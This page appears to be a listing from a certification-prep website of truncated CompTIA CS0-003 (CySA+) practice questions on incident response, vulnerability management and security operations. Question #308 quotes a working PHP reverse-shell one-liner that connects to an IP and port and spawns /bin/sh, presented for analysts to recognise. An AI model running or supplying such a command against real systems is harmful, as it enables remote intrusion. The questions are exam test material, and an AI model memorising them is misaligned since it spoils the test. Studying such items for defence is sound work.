Browse Exams Pricing

ExamsCS0-003Questions

CS0-003 Exam Questions

658 real CS0-003 exam questions with expert-verified answers and explanations. Page 7 of 14.

Question #304Incident Response and Management
A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has au...
Incident ResponseMalware AnalysisThreat IntelligenceEDR
Question #305Security Operations
A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause?
Network Traffic AnalysisPort 1433Database ReplicationSecurity Operations Center (SOC)
Question #306Vulnerability Management
Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?
Risk registerRisk managementVulnerability managementThreat management
Question #308Security Operations
While reviewing web server logs, a security analyst discovers the following suspicious line: php -r '$socket=fsockopen("10.0.0.1", 1234); passthru ("/bin/sh -i <&3 >&3 2>&3");' Whi...
Reverse shellCommand executionWeb server securityNetwork exploitation
Question #309Incident Response and Management
Which of the following should be updated after a lessons-learned review?
Lessons learnedIncident response planPost-incident reviewPlan update
Question #310Vulnerability Management
A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effec...
Application SecuritySecure Software Development Life CycleCode ReviewOWASP
Question #311Security operations
An analyst suspects cleartext passwords are being sent over the network. Which of the following tools would best support the analyst's investigation?
Network traffic analysisPacket captureWiresharkSecurity tools
Question #312Security Operations
Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the victim organization...
Cyber Kill ChainWeaponizationThreat Actor TacticsEndpoint Security Evasion
Question #314Vulnerability Management
A security analyst reviews the following Arachni scan results for a web application that stores PII data: Which of the following should be remediated first?
Web application securitySQL injectionPIIVulnerability prioritization
Question #315Vulnerability Management
Which of the following stakeholders are most likely to receive a vulnerability scan report? (Choose two.)
Vulnerability reportsStakeholder communicationVulnerability scanning
Question #316Security operations
Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage?
SOC operationsAlert fatigueSOARAutomation
Question #317Vulnerability Management
An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. Which of the followi...
Vulnerability reappearanceRemediationDatabase securityRoot cause analysis
Question #318Vulnerability Management
A company has decided to expose several systems to the internet. The systems are currently available internally only. A security analyst is using a subset of CVSS3.1 exploitability...
Vulnerability prioritizationCVSSThreat exposureInternet-facing systems
Question #319Incident Response and Management
During an incident in which a user machine was compromised, an analyst recovered a binary file that potentially caused the exploitation. Which of the following techniques could be...
Malware analysisStatic analysisBinary analysisIncident response
Question #320Vulnerability Management
A leader on the vulnerability management team is trying to reduce the team's workload by automating some simple but time-consuming tasks. Which of the following activities should t...
Vulnerability managementAutomationWorkload reductionAgent health checks
Question #321Reporting and Communication
The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its investment in tools...
Cybersecurity frameworksISO 27001Information security managementGovernance
Question #322Incident Response and Management
A high volume of failed RDP authentication attempts was logged on a critical server within a one- hour period. All of the attempts originated from the same remote IP address and ma...
Brute-force attackAccount lockoutAuthentication securityMitigation controls
Question #323Incident Response and Management
An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary analysis indicates that this malware disables host security services and p...
Malware AnalysisDigital ForensicsIncident ResponseRoot Cause Analysis
Question #324Security Operations
When undertaking a cloud migration of multiple SaaS applications, an organization's systems administrators struggled with the complexity of extending identity and access management...
Cloud SecurityIAMZero TrustZTNA
Question #325Vulnerability Management
A security analyst reviews the following extract of a vulnerability scan that was performed against the web server: Which of the following recommendations should the security analy...
Web Server HardeningVulnerability ManagementInformation DisclosureSecurity Configuration
Question #326Incident Response and Management
A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst should properly docu...
Incident documentationEvidence collectionPhysical security incidentIncident response procedures
Question #327Security operations
A cybersecurity analyst is participating with the DLP project team to classify the organization's data. Which of the following is the primary purpose for classifying data?
Data ClassificationDLPData GovernanceInformation Security
Question #328Security operations
A security analyst observed the following activity from a privileged account: - Accessing emails and sensitive information - Audit logs being modified - Abnormal log-in times Which...
Insider threatPrivileged account compromiseAbnormal behaviorAudit log modification
Question #329Vulnerability Management
A vulnerability management team found four major vulnerabilities during an assessment and needs to provide a report for the proper prioritization for further mitigation. Which of t...
Vulnerability prioritizationThreat intelligenceIoCsAdversary campaigns
Question #330Security operations
A security analyst received an alert regarding multiple successful MFA log-ins for a particular user. When reviewing the authentication logs, the analyst sees the following: Which...
MFA attacksPush phishingImpossible geo-velocityAuthentication logs
Question #331Security operations
A security analyst has identified a new malware file that has impacted the organization. The malware is polymorphic and has built-in conditional triggers that require a connection...
Malware analysisSandbox environmentPolymorphic malwareSecure analysis
Question #332Vulnerability Management
Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?
Threat modelingOWASPApplication security
Question #333Incident Response and Management
Which of the following would an organization use to develop a business continuity plan?
Business continuity planCritical systemsPrioritization
Question #334Reporting and Communication
The management team requests monthly KPI reports on the company's cybersecurity program. Which of the following KPIs would identify how long a security threat goes unnoticed in the...
KPIsSecurity metricsMean time to detectThreat detection
Question #335Security operations
Which of the following best describes the key elements of a successful information security program?
Information security programSecurity policyRoles and responsibilitiesAsset management
Question #337Security operations
Which of the following is a nation-state actor least likely to be concerned with?
Nation-state actorsThreat actorsAdversary motivationsLegal action
Question #338Security operations
Which of the following is a commonly used four-component framework to communicate threat actor behavior?
Threat intelligence frameworksDiamond ModelThreat actor behavior
Question #339Security operations
An employee downloads a freeware program to change the desktop to the classic look of legacy Windows. Shortly after the employee installs the program, a high volume of random DNS q...
MalwareDNS queriesDefense evasionPersistence
Question #340Reporting and Communication
An organization discovered a data breach that resulted in PII being released to the public. During the lessons learned review, the panel identified discrepancies regarding who was...
Data breachExternal reportingRegulatory complianceLessons learned
Question #341Incident Response and Management
During an incident, a security analyst discovers a large amount of PII has been emailed externally from an employee to a public email address. The analyst finds that the external e...
Data exfiltrationPIIIncident responseLegal hold
Question #342Security operations
Which of the following can be used to learn more about TTPs used by cybercriminals?
MITRE ATT&CKTTPsthreat intelligence
Question #343Security operations
Which of the following statements best describes the MITRE ATT&CK framework?
MITRE ATT&CKthreat intelligence frameworkattack frameworks
Question #344Vulnerability Management
A Chief Information Security Officer (CISO) is concerned that a specific threat actor who is known to target the company's business type may be able to breach the network and remai...
Adversary emulationred teamingthreat actors
Question #345Security operations
A security analyst receives an alert for suspicious activity on a company laptop. An excerpt of the log is shown below: Which of the following has most likely occurred?
Malicious macroslog analysisattack vectors
Question #346Incident Response and Management
During an incident, some IoCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next?
Incident responsecontainmentransomwareIoCs
Question #347Reporting and Communication
An MSSP received several alerts from customer 1, which caused a missed incident response deadline for customer 2. Which of the following best describes the document that was violat...
SLAincident response metricsservice agreements
Question #348Reporting and Communication
Which of the following is a reason proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response?
Evidence handlinglegal reportingincident response
Question #349Security operations
An attacker has just gained access to the syslog server on a LAN. Reviewing the syslog entries has allowed the attacker to prioritize possible next targets. Which of the following...
Passive reconnaissancefootprintingsyslog analysis
Question #350Security operations
A security analyst observed the following activities in chronological order: 1. Protocol violation alerts on external firewall 2. Unauthorized internal scanning activity 3. Changes...
Data exfiltrationnetwork anomaliesthreat actor goals
Question #351Vulnerability Management
After reviewing the final report for a penetration test, a cybersecurity analyst prioritizes the remediation for input validation vulnerabilities. Which of the following attacks is...
Input validationcross-site scriptingweb vulnerabilitiesremediation
Question #352Vulnerability Management
During a security test, a security analyst found a critical application with a buffer overflow vulnerability. Which of the following would be best to mitigate the vulnerability at...
Buffer overflowinput validationapplication security
Question #353Incident Response and Management
The SOC received a threat intelligence notification indicating that an employee's credentials were found on the dark web. The user's web and log-in activities were reviewed for mal...
Compromised credentialsincident responsepassword resetMFA
Question #354Vulnerability Management
A security analyst is working on a server patch management policy that will allow the infrastructure team to be informed more quickly about new patches. Which of the following woul...
Patch managementCVE detailsvulnerability remediationbaseline configuration
Question #355Vulnerability Management
Chief Information Security Officer (CISO) wants to disable a functionality on a business-critical web application that is vulnerable to RCE in order to maintain the minimum risk le...
Risk treatmentrisk mitigationRCE vulnerability
Question #356Vulnerability Management
A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could bypass this control....
Compensating controlsauthentication vulnerabilitysecurity controls

PreviousPage 7 of 14Next

study smarter, certify faster.

Product

Browse Exams
Pricing
PDF Downloads

Resources

Blog
Glossary
Topics
FAQ
Contact Us

Legal

Terms of Service
Privacy Policy
Cookie Policy
DMCA
Refund Policy

Company

About
Contact

© 2026 NerdExam. All rights reserved.Built for IT professionals

NerdExam is a trading name of WADL Solutions Limited, a company incorporated in Hong Kong (CR# 80143234). Registered office: Unit 2904-05, 29/F, Universal Trade Centre, 3 Arbuthnot Road, Central, Hong Kong.

CompTIA, AWS, Cisco, Microsoft, Google Cloud, Oracle, VMware, and other certification names referenced on this site are trademarks of their respective owners. NerdExam is not affiliated with, endorsed by, or sponsored by any certification vendor.